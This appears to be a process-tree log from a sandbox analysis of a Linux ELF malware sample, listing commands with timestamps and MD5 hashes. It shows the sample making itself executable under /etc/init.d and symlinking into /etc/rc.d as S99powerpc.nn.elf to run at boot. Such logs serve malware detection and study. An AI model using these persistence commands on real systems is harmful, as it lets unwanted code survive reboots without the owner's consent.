                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "chmod +x /etc/init.d/powerpc.nn.elf >/dev/null 2>&1"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/chmod
                                                                    Arguments:chmod +x /etc/init.d/powerpc.nn.elf
                                                                    File size:63864 bytes
                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/mkdir
                                                                    Arguments:mkdir -p /etc/rc.d
                                                                    File size:88408 bytes
                                                                    MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:sh -c "ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf >/dev/null 2>&1"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/bin/ln
                                                                    Arguments:ln -s /etc/init.d/powerpc.nn.elf /etc/rc.d/S99powerpc.nn.elf
                                                                    File size:76160 bytes
                                                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/tmp/powerpc.nn.elf
                                                                    Arguments:-
                                                                    File size:5388968 bytes
                                                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/lib/udisks2/udisksd
                                                                    Arguments:-
                                                                    File size:483056 bytes
                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/sbin/dumpe2fs
                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                    File size:31112 bytes
                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/lib/systemd/systemd
                                                                    Arguments:-
                                                                    File size:1620224 bytes
                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                    Start time (UTC):08:13:50
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                    Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                    File size:22760 bytes
                                                                    MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/lib/udisks2/udisksd
                                                                    Arguments:-
                                                                    File size:483056 bytes
                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/sbin/dumpe2fs
                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                    File size:31112 bytes
                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/lib/udisks2/udisksd
                                                                    Arguments:-
                                                                    File size:483056 bytes
                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                    Start time (UTC):08:13:51
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/sbin/dumpe2fs
                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                    File size:31112 bytes
                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                    Start time (UTC):08:13:52
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/lib/udisks2/udisksd
                                                                    Arguments:-
                                                                    File size:483056 bytes
                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                    Start time (UTC):08:13:52
                                                                    Start date (UTC):27/12/2024
                                                                    Path:/usr/sbin/dumpe2fs
                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                    File size:31112 bytes
                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4